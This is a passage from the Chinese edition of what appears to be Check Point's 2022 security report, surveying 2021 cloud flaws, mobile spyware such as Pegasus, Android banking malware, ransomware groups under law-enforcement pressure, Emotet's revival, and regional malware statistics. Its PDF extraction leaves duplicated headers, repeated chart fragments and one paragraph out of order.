最近的研究还深挖了一项名为“HTTP 标头走私”的

技术,以及该技术在攻击 AWS 的 API Gateway 和

身份验证提供商 AWS Cognito 时有何潜在用途。研

究演示了如何利用该技术绕过限制并达到缓存中毒目

的。

在 2021 年末,研究人员终于注意到 AWS 权限发生了

特殊的变化,可能会允许 AWS 支持服务读取客户的

S3 数据存储桶,而不仅仅是观测其元数据。这种潜在

隐私缺陷的形成原因是对名为“AWSServiceRoleFor

Support”的强制角色的权限进行了更改,该角色创

建的目的是为了提供技术和管理支持。更改最终得以

恢复,AWS 表示他们将实施额外的保护措施,以防

止未来出现此类错误配置。

总结说来,在 2021 年,云提供商漏洞变得比以往更

加令人担忧。这一年中曝光的漏洞允许攻击者在长

短不一的时间范围内执行任意代码、升级到 Root 权

限、访问大量私人内容,甚至在不同环境之间切换。

简言之,云基础设施本身的漏洞已经暴露出来,即使

是最具警惕性和专业性的云用户也无法预见或预防这

些漏洞。

第第 3 3 章章

25CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 25CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

我们首先来看有关 NSO 的 Pegasus 的动态,这是

最为人不齿的移动恶意软件系列之一。Pegasus 是

一种能够感染 iOS 和 Android 设备的移动间谍软件,

由以色列的 NSO 组织开发和销售。该间谍软件可以

完全控制移动设备并获取众多类型的数据,例如消

息、照片、日历、电子邮件等。此外,该恶意软件

能够激活摄像头,采集图像,以及对周边对话进行

录音。Pegasus 的感染过程基于处心积虑的零点击

漏洞。尽管该恶意软件首次披露于 2016 年,但在

2019 年人们发现该间谍软件利用 WhatsApp 服务感

染了超过 1,400 名用户,这些用户是多个 NSO 客户

的目标。

2021 年 7 月,据大量新闻媒体报道,该工具已被

用于访问全球各地政府官员、记者、人权活动家和

企业高管的移动设备。一份包含大约 50,000 名潜在

移动终端领域新动态

整个 2021 年间,威胁执行者对移动设备的攻击与日俱增,包括针对大规模终端用户活动和目标企

业的攻击。一项基于调查的研究表明,在工作场所实施“BYOD”(自带设备)政策,即员工使用

自己的个人设备代替指定的公司设备,导致组织准备不足,大约 49% 的受访企业表示他们无法检

测到员工自有设备上的攻击或事件。

Pegasus 受害者的名单流出并登上新闻头条,可能

会将 NSO 客户推到台前。媒体关注引发了广泛的研

究,旨在揭示 Pegasus 的感染方法,并帮助用户在

其设备上检测 Pegasus。最终在 9 月,Apple 针对

Pegasus 利用的 iMessage 中的两个零日漏洞(分别

为 CVE-2021-30860 和 CVE-2021-30858)发布了

补丁。这些漏洞会允许恶意文档执行命令,造成

iPhone 和 Mac 遭到利用。11 月,Apple 对 NSO 提

起诉讼,指控其在 Apple 设备上使用黑客软件并窃

取私人数据。威胁执行者自然不会错失机会,他们马

上围绕传言炮制了勒索骗局。最近的一项活动利用了

公众对 Pegasus iOS 间谍软件的恐惧,通过传播包

含赎金要求的电子邮件,并声称拥有受害者的私密视

频(宣称由 Pegasus 恶意软件拍摄),试图恐吓潜

在受害者。

第第 3 3 章章

26CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 26CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Pegasus 的生存之道在于不露痕迹的零点击感染过程、

有争议的受害者名单和复杂的数据泄露功能,同类软件

当然不会允许它长期独霸一方。接近年底时,研究人员

在私营企业移动间谍软件领域发现了另外的威胁执行者。

北马其顿公司 Cytrox 正销售一款名为 Predator 的针

对 iPhone 设备的间谍软件,该软件通过 WhatsApp

发送的单击链接来感染客户的目标。随着越来越多有关

恶意软件功能的信息公之于众,常见威胁执行者和组织

就有更大几率利用这些功能。此外,移动终端间谍软件

比比皆是,以及该领域在 2021 年引起关注,也进一步

表明移动设备在网络威胁领域中扮演关键角色。

在这一年中,我们观察到威胁执行者投入大量精力

入侵 Facebook 和 Telegram 等主流社交媒体帐户,

包括实施旨在获取移动设备访问权限的大规模攻击活

动。8 月,一种名为“FlyTrap”的新型 Android 木

马病毒被发现自 2021 年 3 月以来已破坏 144 个县

的至少 10,000 个 Facebook 帐户,其主要传播渠道

为 Google Play 商店中提供的恶意应用程序。这些

应用程序在上传后迅速由平台移除,但随后出现在

第三方 App 商店中。攻击者还利用 WhatsApp 为安

装了“Triada”木马病毒的 Android 设备分发修改后

的 App 版本。10 月,研究人员在 Google Play 商店

中发现一款照片编辑应用程序,其中包含一段恶意

代码,可以收集用户的 Facebook 凭据,用于借助

受害者的付款信息进行广告活动。有数千名用户下

载了该 App。最后,在 11 月,名为“MasterFred”

的新款 Android 恶意软件因使用覆盖式虚假登录从

Netflix、Instagram 和 Twitter 用户处窃得信用卡信息

而鼓噪一时。

2021 年大出风头的另一个重要攻击向量依赖 SMS

消息来分发恶意软件。SMiShing 是 SMS phishing

(短信钓鱼)的简称,是一种借助移动设备进行社会

工程分发的网络钓鱼技术,利用 SMS 消息作为攻击

向量。依靠这种技术的 FluBot Android 僵尸网络在

2021 年 4 月恢复了活动,尽管其攻击者已由西班牙

警方批捕。9 月,该僵尸网络在其武器库中添加了危

害 Android 设备的新方法,并开始散播虚假安全更

新消息,将其伪装成 FluBot 感染警告的形式。一旦

受害者点击“安装安全更新”按钮,即会触发感染。

FluBot 于 11 月再次出现在针对芬兰用户的活动中。

攻击向量在 FluBot 活动中展示成效之后,SMiShing

逐渐由低技能攻击者采用。例如,Check Point

第第 3 3 章章

27CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 27CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Research 最近开展的一项调查表明,SMiShing 攻击

在伊朗屡屡得手,尽管这些攻击者的工具集质量普遍

较低。这些活动在利用 SMiShing 的同时,还假冒伊

朗政府、司法系统、购物门户网站等重要实体。不法

分子对这种攻击方式趋之若鹜,相关警告频频见诸新

闻媒体。最近这波攻击的规模可谓前所未有,如果了

解地下论坛和 Telegram 频道上畸形繁荣的“僵尸网

络即服务”市场,会觉得这种情况也在意料之中。网

络钓鱼工具包售价从 50 美元到 100 美元不等。我们

估计,受 FluBot 成功使用 SMiShing 启发,类似活

动可能很快也会在其它国家/地区出现。

2021 年围绕 SMS 消息发生的另一个大型骗局是

“UltimaSMS”,这项大规模活动利用了大约 150 个

Android 应用程序。活动在 Google Play 商店获得超

过 1,000 万次应用下载量,其伎俩是在受害者不知

情的情况下诱使他们订阅付费短信服务。

最后,全球疫情引起的系统性变化也在影响移动终

端银行恶意软件领域。银行业数字化在 2021 年不

断扩大,导致各种旨在限制离线交互的应用程序浮

出水面,反过来带动了新威胁的传播。9 月,Check

Point Research 发现了一种滥用设备上的无障碍服

务对 Android 用户发动攻击的新方法。这次攻击针

对的是 PIX 的用户,该即时支付解决方案由巴西央

行创建并管理,刚刚问世一年,但普及度颇高。攻

击活动使用了由 Google Play 商店中的两款恶意应

用程序分发的两种银行恶意软件变种。更为罕见的

是,PixStealer 滥用 Android 的无障碍服务 (AAS),

通过 PIX 交易从特定银行窃取资金。这种简单而新

奇的功能组合能让恶意软件在不与 C&C 交互的情况

下收集资金,做到瞒天过海。由于简单高效,可以预

见其它威胁执行者也会纷纷效仿这种做法。

第第 3 3 章章

28CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 28CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

对于多个勒索软件组织来说,过去一年历经动荡,原

因尤其在于政府和执法机构对有组织的威胁执行者改

变了立场。他们从采取预防性被动应对措施,转向针

对勒索软件操纵者本身及其资金和支持基础设施采取

前瞻式主动攻击行动。重大转变发生在 5 月的 Colonial

Pipeline 事件之后,当时 DarkSide 勒索软件攻击导

致美国东海岸燃料严重短缺,促使拜登政府意识到他

们必须加大力度应对威胁。

勒索软件操纵者是整个行动的中坚力量,不仅提供勒

索软件,还提供洗钱服务并配备谈判专家。不同的勒

索软件计划会竞相拉拢联盟成员,因此勒索软件组织

不断为其联盟计划开发更具吸引力的工具和服务,以

帮助他们在竞争激烈的地下社区脱颖而出。声誉是一

项关键的激励因素,可能影响组织赚取高额回报的机

会,甚至导致政府机构逮捕攻击者。因此,网络犯罪

分子通过法庭讨论来调解内部纠纷也就不足为奇,而

庭审败诉则可能导致组织声誉和利润受损。

勒索软件生态系统的破绽 勒索软件操纵者以往可能会以受害者家人照片为筹码,要求对方支付 200 美元赎金,这种情况早已一

去不返。如今的勒索软件在经济方面动辄抛出大动作,在系统完全关闭的威胁下,整个组织的行动都

受到控制。勒索软件商业模式的演变是这一现象的核心。勒索软件即服务 (RaaS) 以较低入门成本推

出联盟计划,使任何攻击者都能轻松加入攻击大军。攻击者可以选择领先的勒索软件“项目”,并遵

循详尽易懂的免费操作手册,其中包含攻击每个阶段的完整说明。如果入侵成功,勒索软件操纵者及

联盟成员将比例瓜分由受害者支付的赎金。这种获利丰厚的方案使攻击者能够触及更大范围的受害

者,并为所有参与者提供更高的回报。

第第 3 3 章章

29CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 29CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

11 月,国际刑警组织牵头开展了代号为“旋风行动”

的国际联合行动,成功查封 Cl0p 基础设施并逮捕一

干洗钱联盟成员。该组织是 Accellion 泄露的幕后黑

手,也是众多双重和三重勒索事件的始作俑者。此

外,美国司法部和其它联邦机构也对 REvil 采取进一

步行动。这些行动包括逮捕其成员、追回价值 600

万美元的赎金、没收设备以及叫停价值 1000 万美元

的赏金计划。

勒索软件生态系统内部对于这些进展反应不一,一些

组织表露敌意,进一步打压受害者,以此逼迫当局远

离他们的生意。比如,Grief Ransomware 威胁称,

如果受害者聘请专业谈判人员,他们将彻底删除受害

者的解密密钥。同样,对于与 FBI 或其他执法机构

联系的受害者,RagnarLocker 在网上公开了从他们

那里窃取的所有内容。

其它组织似乎集中精力进行自我调整和品牌重塑,避免

与重大攻击发生过于密切的联系。例如,Darkside 暂

时退出勒索软件领域,至少其部分成员已在 7 月更名为

BlackMatter。他们对营销服务提供商 Marketron、日

当月晚些时候,DarkSide 团伙宣布其服务器被查封,用

于支付“勒索软件即服务”项目联盟成员的加密货币基

金被盗,故而他们将关闭运营。6 月,美国司法部 (DOJ)

将勒索软件升级为国家安全威胁,将其列为与恐怖主义

相同的优先级别。接下来的重大事件是在 7 月发生的

Kaseya MSP 平台漏洞攻击事件,之后 REvil 作案者

神秘失踪,其泄密网站“Happy Blog”下线,客户支持

服务显然也已关闭。不过经过短暂关停,该组织于 9 月

重新出山。此后,一次疑似执法行动成功劫持了他们的

基础设施和“Happy Blog”,他们在 10 月再次销声匿

迹。

9 月,拜登政府进一步打击勒索软件,并宣布将开始

制裁勒索软件威胁执行者用来将支付的赎金转化为有

形资金的加密货币交易所、钱包和交易商。总部位于

俄罗斯的 SUEX 交易所成为第一家因参与赎金交易

而被列入制裁名单的交易所。次月,欧盟和另外 31

个国家宣布,他们将联手瓦解其它加密货币渠道,合

力挫败洗钱图谋。此外,澳大利亚政府发布了“反勒

索软件行动计划”,包括组建全新特别工作组,并对

勒索软件攻击者实施更严厉的处罚。

第第 3 3 章章

30CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 30CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

最后,在过去一年中,我们还看到勒索软件社区在重

压之下渐生罅隙,甚至有关门大吉的迹象,一些操纵

者完全放弃了他们的业务。例如,Avaddon 网络犯罪

团伙于 2020 年 6 月首次出现,但仅仅一年后便被迫

关闭并公开解密密钥,原因无疑是执法部门加强了审

查。在另一个例子中,Conti 勒索软件针对的是 British

Graff Jewelry,后来意识到一些被盗数据属于沙特、

阿联酋和卡塔尔王室,随即公开道歉。由于担心遭到

报复,他们承诺不经审查就删除这些数据。各大网络

犯罪论坛禁止在其平台上发布任何勒索软件广告,避

免引起注意。这令操纵者更难与联盟成员进行有效沟

通,增加了落入警方之手的风险。

世界各国政府的前瞻式措施和攻击性行动初见成效,

显著削弱了勒索软件生态系统,扰乱了勒索软件的运

作,并对地下环境造成重大破坏。尽管如此,数百万

美元的潜在收入意味着我们可能会在 2022 年看到更

多勒索软件“项目”,其中达成目标的项目将成为日

后改良版攻击的样板。勒索软件操纵者通过 2021 年

的事件可能得出的一个结论是,勒索软件操纵者选择

的目标类型或将造成不同后果,决定攻击行动是持久

战还是闪电战。

本科技公司 Olympus 以及美国爱荷华州的新农民合作

组织等关键基础设施进行了攻击。不过更名后的组织只

是昙花一现,BlackMatter 在 11 月即宣布因政府施压

而关闭。他们甚至表示,团队成员“在收到最新消息后便

联系不上”,但专家认为,这是由于加密漏洞导致安全公

司解密了受害者文件,在联盟成员内部引发信任问题。作

为地下合作最后的挣扎,BlackMatter 与 LockBit 勒索

软件携手,将他们的受害者转移到 LockBit 平台,以便

在隐退之前大捞一笔。

可惜并非所有勒索软件组织都能协调合作。持续竞争

加深了组织间的不信任,也加剧了攻击者对于遭到当

局逮捕的恐惧。例如,REvil 操纵者通过劫持赎金谈

判过程、使用双开聊天以及借助后门程序剔除股份等

方式,对其联盟成员予以欺骗。Conti 组织经历了一

场内部危机,起因是一位心怀不满的联盟成员泄露了

Conti 的行动手册,并抱怨薪酬太低。

第 3 章

31CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 4 4 章章

恶意软件聚焦恶意软件聚焦: EMOTET 卷土重来

04

EMOTET 是史上最危险、最为劣迹斑斑的僵尸网络之一,尽管国际社会和 世界各地的执法机构经过长期协同作战,最终于 2021 年 1 月将其剿灭, 但它仍然卷土重来。

32CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 32CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Emotet 是史上最危险、最为劣迹斑斑的僵尸网络之一,尽管国际社会和世界各地的执法机构经过长

期协同作战,最终于 2021 年 1 月将其剿灭,但它仍然卷土重来。Emotet 是一种由银行木马转变而

来的模块化僵尸网络,以其在全球大规模感染逾 150 万台计算机、破坏数千家公司的网络而名声在

外。Emotet 被用作分发平台来提供其它声名狼藉的恶意软件系列,例如 TrickBot、Qbot 和 Dridex,

通常会引发整个网络范围内的勒索软件攻击,进而导致整个组织陷入瘫痪。在遭到强制关停之前,

该网络造成的损失据估算达到约 25 亿美元。

ALEXANDRA GOFMAN

Check Point Research 团队主管

第第 4 4 章章

业界在临近年末时已经认识到,纵使出动国际特遣部队,恐 怕也只能延缓 Emotet 的速度,而很难将其连根拔除。

该组织无论如何也能有部分成员侥幸逃脱法律制裁,在一段 时间休养生息过后重整旗鼓,利用他们原有的地下联系渠

道,发起新一轮经过改良的全球性垃圾邮件活动。

Trickbot 和 Emotet 早就沆瀣一气,多有不法之举,Emotet 利用 TrickBot 服务作为植入程序为自己招魂,在很多意义上 都并不让人意外。”

33CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 33CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

11 月 14 日,Emotet 正式起死回生,这是自其遭到取缔以来首次观测到活体样本。Emotet 的复活来

源令人惊讶:TrickBot 僵尸网络被用来将 Emotet 样本投放至感染了 TrickBot 恶意软件的机器。就在

次日,Emotet 即已恢复其标志性分发方式,通过大规模垃圾邮件活动使用恶意文档附件来传播木马

病毒。为重建网络,Emotet 操纵者选择将其垃圾邮件僵尸网络投放至已成功感染的机器,这种方法

使他们得以将恶意软件散播至更多潜在目标。

鉴于以往狼狈为奸的历史,作为植入程序的 TrickBot 服务是 Emotet“借尸还魂”的自然选择。事实

上,这可能表明它的复活过程少不了恶意软件老搭档的参与。TrickBot 本身在 2020 年曾短暂失势,

经过一段时间的苟延残喘,于 2021 年 5 月、6 月和 2021 年 9 月重回主要恶意软件系列排行榜。去

年,Check Point Research 在全球发现了超过 140,000 名 TrickBot 受害者,涉及 200 多个活动和数

千个受损网络。庞大的安装基础使得 TrickBot 成为重启 Emotet 新僵尸网络的完美平台。

Emotet 本身变得更加强大,在其工具箱中增加了一些新功能。升级后的变种使用椭圆曲线加密算法

而非 RSA 加密,改进了控制流扁平化技术,并在其初始传播方式中添加了使用冒充合法软件的恶意

Windows App 安装程序包。此外,研究人员发现,Emotet 现在会首先直接投放 Cobalt Strike 信标

而不是中间恶意软件系列,后者则会在一段时间过后投放 Cobalt Strike 信标。Cobalt Strike 在前些

年一直是针对性勒索软件攻击的基石,现在的走势让人心下一凛,这意味着从最初的 Emotet 感染到

全面爆发,勒索软件攻击的持续时间变得更短,防御机制响应持续攻击的时间由此被大幅压缩。

自 Emotet 重生以来,Check Point Research 观测到其活跃程度至少达到 2021 年 1 月时(即覆灭

之前)的 50%。这种上升势头在整个 12 月当中一直延续,加上年底一波兴风作浪,预计会持续到

2022 年,至少在下一次清剿行动之前仍将如此。

第第 4 4 章章

34CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 5 5 章章

全球全球统计信息 05

与 2020 年相比,2021 年每周对企业网络的整体攻击增加 50%。

35CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 35CHECK POINT SOFTWARE | 2022 年安全报告

全球全球

美洲美洲

不同地区网络攻击类别不同地区网络攻击类别

图 1:全球企业网络遭遇各种恶意软件类型攻击的百分比。

图 2:美洲地区企业网络遭遇各种恶意软件类型攻击的百分比。

31%

21%

19%

19%

14%

8%

僵尸网络

信息窃取木马

加密货币挖矿软件

银行

移动终端

勒索软件

僵尸网络

信息窃取木马

加密货币挖矿软件

银行

移动终端

勒索软件

25%

18%

15%

15%

14%

6%

35CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

36CHECK POINT SOFTWARE | 2022 年安全报告

不同地区网络攻击类别不同地区网络攻击类别

欧洲、中东和非洲欧洲、中东和非洲

亚太地区亚太地区

图 3:欧洲、中东和非洲地区企业网络遭遇各种恶意软件类型攻击的百分比。

图 4:亚太地区企业网络遭遇各种恶意软件类型攻击的百分比。

僵尸网络

信息窃取木马

加密货币挖矿软件

银行

移动终端

勒索软件

30%

23%

19%

19%

14%

8%

僵尸网络

信息窃取木马

加密货币挖矿软件

银行

移动终端

勒索软件

43%

30%

25%

25%

13%

10%

36CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

37CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 37CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

全球威胁指数图全球威胁指数图

图 5.全球威胁指数图

以下全球网络威胁风险指数地图显示了全球主要风险区域。*

* 颜色越深 = 风险越高

* 灰色 = 数据不足

第第 5 5 章章

38CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 38CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

1605 (+75%)教育/科研 政府/军队

通信

ISP/MSP

医疗保健

SI/VAR/分销商

公用事业

制造业

金融/银行

保险/法律

娱乐/酒店

顾问

软件供应商

零售/批发

交通

硬件供应商

1136 1079 1068

830 778

736 704 703

636 595

576 536

526 501

367

(+47%)

(+51%)

(+67%)

(+71%)

(+18%)

(+46%)

(+41%)

(+53%)

(+68%)

(+40%)

(+73%)

(+146%)

(+39%)

(+34%)

(+16%)

图 6:与 2020 年相比,2021 年按行业划分每个组织平均每周发生的攻击次数。

在 2021 年,全球针对企业网络的网络攻击较 2020 年增加了 50%。“教育/研究”类别是

攻击最为集中的行业,每个组织平均每周发生 1,605 次攻击(增长 75%),而“软件供应

商”类别同比增幅最高,达到 146%。针对软件供应商的攻击增多,这与 2021 年观察到的

软件供应链攻击不断增长的趋势密切相关。

第第 5 5 章章

39CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 39CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

主要恶意文件类型:主要恶意文件类型:WEB VS WEB VS 电子邮件电子邮件

图 7:Web – 主要恶意文件类型

图 8:电子邮件 – 主要恶意文件类型

ex e

pd f

do c xls xls

x jar ba t

do cx ps

1 ap

k 其 他

52%

20%

5% 3% 3% 2% 2% 1% 1% 1%

10%

ex e

xlx s

pd f rtf do

c xls

m do

cx xls xls b

pp t

其 他

34%

16%

9% 7% 7% 6% 6% 5%

3% 2%

6%

第第 5 5 章章

40CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 40CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 9:分发协议 – 电子邮件与 Web 攻击向量(2019 年、2020 年和 2021 年)。

64%

36%

83%

17%

84%

16%

电子邮件 WEB

2019 2020 2021

上图表明,自 2020 年初以来,与使用网站分发恶意

软件有效负载的情况逐渐减少相比,电子邮件已稳步

发展成为最流行的攻击向量。

无论用于针对性攻击还是由新手攻击者发起的碰运气

式的攻击活动,基于电子邮件的攻击都能轻松地将恶

意软件分发至广泛的目标和公司。

电子邮件攻击增加的原因之一在于由大型犯罪组织

赞助和运营的大规模活动数量庞大,致力于分发当

今最著名的恶意软件系列,例如 TrickBot、Dridex、

Qbot、IcedID 或是 Emotet。

这些团伙在了解到带有恶意 Office 文档附件的垃圾

邮件活动有效之后,几乎只会将其用作新网络的主

要感染向量。

第第 5 5 章章

41CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 41CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

主要恶意软件系列主要恶意软件系列

图 10:全球最流行的恶意软件。 企业网络遭遇每种恶意软件系列攻击的百分比。

图 11:美洲最流行的恶意软件。

美洲美洲

Tr ick

bo t

Qb ot

Fo rm

bo ok

Em ot

et

Dr id

ex

Ag en

tT es

la

Ph or

pi ex

Re m

co s

Gl up

te ba

XM Ri

g

11.0%

5.2% 5.0% 4.9% 4.4% 4.1% 4.0% 4.0% 3.7% 3.5%

全球全球

Tr ick

bo t

Re m

co s

Fo rm

bo ok

Ph or

pi ex

Dr id

ex

Em ot

et Qb

ot

Gl up

te ba

XM Ri

g

Ra cc

oo n

9.7%

3.6% 3.5% 3.5% 3.0% 3.0% 2.9% 2.6% 2.4% 2.4%

全球恶意软件统计信息 本报告以下章节列出的数据比较是基于 Check Point ThreatCloud 网络威胁地图 2021 年 1 月至 12 月的数据。

下面显示的是每个地区最流行的恶意软件。

第第 5 5 章章

42CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 42CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 12:EMEA 最流行的恶意软件。

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA)

图 13:APAC 最流行的恶意软件。

亚太地区亚太地区 (APAC) (APAC)

Tr ick

bo t

Qb ot

Em ot

et

Dr id

ex

Fo rm

bo ok

Ag en

tT es

la

Re m

co s

Ph or

pi ex

XM Ri

g

Gl up

te ba

10.8%

7.8%

5.9% 5.4% 5.0% 4.7%

4.2% 3.6% 3.6% 3.3%

Tr ick

bo t

Fo rm

bo ok

Ra m

ni t

Gl up

te ba

Ag en

tT es

la

Ph or

pi ex

Em ot

et

XM Ri

g

Dr id

ex

Ur sn

if

14.5%

7.8% 7.5% 7.1% 6.9% 6.2% 6.0% 5.7%

4.8% 4.8%

第第 5 5 章章

43CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 43CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

主要恶意软件全局分析

自我们发布上一份年度全球恶意软件排名以来,一些明显的变化是 RigEK(漏洞利用工

具包)和 LokiBot 不再出现在前 10 名中,取而代之的是 Glupteba 僵尸网络和 Remcos

RAT。

TrickBot 在 2 月升至榜首,取代了 Emotet 的位置,并在 2021 年剩余时间内保持这一排

名。TrickBot 是一种针对 Windows 操作系统的模块化僵尸网络和银行木马病毒。它被认为

是 Emotet 在 2021 年 11 月复活的原因,因为被发现时正在传播同类恶意软件。TrickBot

一直在通过更新获取新功能、特性和分发向量,目的是成为更灵活且可定制的恶意软件,

可以作为多目的攻击活动的一部分进行分发。它在针对性攻击中作为获取初始访问权限的

常用手段,Ryuk、Conti 或 Bazar 等恶意软件则紧随其后。TrickBot 尽管 2020 年 10 月曾

偃旗息鼓,但在 2021 年全年主要恶意软件排行榜中仍然表现突出,它还参与了本年度最

严重的勒索软件攻击之一,即 Conti 针对爱尔兰健康服务管理署的勒索软件攻击。

Phorpiex 是一种僵尸网络,顶峰时期曾控制超过一百万台受感染主机。它通过垃圾邮件

活动分发其它系列恶意软件,助长大规模垃圾邮件、性勒索攻击活动或是勒索软件传播的

气焰,并以此声名鹊起。Phorpiex 在年中处于排名最低点,到 2021 年底则较一年前有所

上升。去年 12 月,Check Point Research 发现 Phorpiex 再度活跃,推出名为“Twizt”

的全新变种,使其能够在没有活动 C&C 服务器的情况下以点对点模式运行。在一年时间

内,Phorpiex 僵尸程序成功劫持了 969 笔交易,窃取了 3.64 个比特币、55.87 个以太币

及 55,000 美元的 ERC20 代币,价值达到近 50 万美元。

第第 5 5 章章

44CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 44CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 14:全球最流行的僵尸网络

图 16:EMEA 最流行的僵尸网络

全球全球

图 15:美洲最流行的僵尸网络

图 17:APAC 最流行的僵尸网络

美洲美洲

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA) 亚太地区亚太地区 (APAC) (APAC)

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot 其他

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Phorpiex Dridex Emotet Qbot Glupteba 其他

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot 其他

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Phorpiex Dridex Emotet Qbot Glupteba 其他

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot 其他

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Phorpiex Dridex Emotet Qbot Glupteba 其他

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot 其他

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba 其他

TrickBot Phorpiex Dridex Emotet Qbot Glupteba 其他

10%

9%

6%

主要僵尸网络主要僵尸网络

第第 5 5 章章

45CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 45CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

僵尸网络全局分析

总体而言,全球主要僵尸网络排行榜中的恶意软件系列与 2020 年并无二致,不过每个系

列的热门程度略有变化。比如 Dridex 从第二名跌至第四名,TrickBot 则升至第一名。

Emotet 是最为前科累累的恶意软件组织之一,自 2014 年以来一直间歇性活动,最初为银

行木马程序,之后变身为僵尸网络。该软件目前位居主要僵尸网络排行榜的第三位。Emotet

在 2021 年 1 月遭铲除之前已经广泛传播,影响了全球超过 150 万台机器,据估算造成约

25 亿美元的损失。它因传播 TrickBot、Qbot 等其它恶意软件系列而臭名远扬。

本年度僵尸网络市场受到 Emotet 垮台的严重影响。Emotet 是规模最大的 PC 僵尸网络活

动之一,它留下的真空由 TrickBot、IcedID 和最近的 Phorpiex 逐渐补上。11 月 15 日,

在分崩离析 10 个月后,Emotet 借由感染了 TrickBot 的机器开始投放样本。利用包含

Emotet 有效负载的恶意文档实施的大型垃圾邮件活动对计算机的危害日趋加剧。

我们注意到,尽管有 9 个月未见动作,Emotet 在 2021 年上半年和 2021 年全球排行榜中

照旧位列三甲,展现出超群的攻击力。

第第 5 5 章章

46CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 46CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 18:全球主要信息窃取恶意软件

图 20:欧洲、中东和非洲主要信息窃取恶意软件

全球全球

图 19:美洲主要信息窃取恶意软件

图 21:亚太地区主要信息窃取恶意软件

美洲美洲

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA) 亚太地区亚太地区 (APAC) (APAC)

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger 其他

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon 其他

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore 其他

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot 其他

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger 其他

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon 其他

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore 其他

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot 其他

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger 其他

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon 其他

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore 其他

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot 其他

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

